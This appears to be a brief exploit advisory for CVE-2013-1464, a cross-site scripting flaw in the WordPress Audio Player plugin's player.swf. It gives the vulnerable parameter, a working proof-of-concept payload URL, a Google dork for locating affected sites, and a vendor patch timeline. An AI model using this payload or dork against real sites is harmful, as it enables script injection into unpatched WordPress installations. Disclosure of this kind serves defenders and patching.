[CVE-2013-1464]WordPress Audio Player Plugin XSS in SWF

# Exploit Title: WordPress Audio Player Plugin XSS in SWF
# Release Date: 31/01/13
# Author: hip [Insight-Labs]
# Contact: [email protected] | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip
# Vendor Homepage: http://wpaudioplayer.com/
# Tested on: XPsp3
# Affected version: 2.0.4.6 before
# Google Dork: inurl:/wp-content/plugins/audio-player/
# REF:CVE-2013-1464
———————————————————————————————————————–
# Introduction:
Audio Player is a highly configurable but simple mp3 player for all your audio needs.
————————————————————————————————————————-
# XSS – Proof Of Concept:

vulnerable path:
/wp-content/plugins/audio-player/assets/player.swf
vulnerabile parameter:playerID

POC:
/wp-content/plugins/audio-player/assets/player.swf?playerID=a\”))}catch(e){alert(1)}//

————————————————————————————————————————-
————
Patch:
————
– Vendor was notified on the 23/01/2013
– Vendor released version 2.0.4.6 on 30/01/2013 Fixed the bug
————————————————————————————————————————-

Leave a Comment



Verify Code   If you cannot see the CheckCode image,please refresh the page again!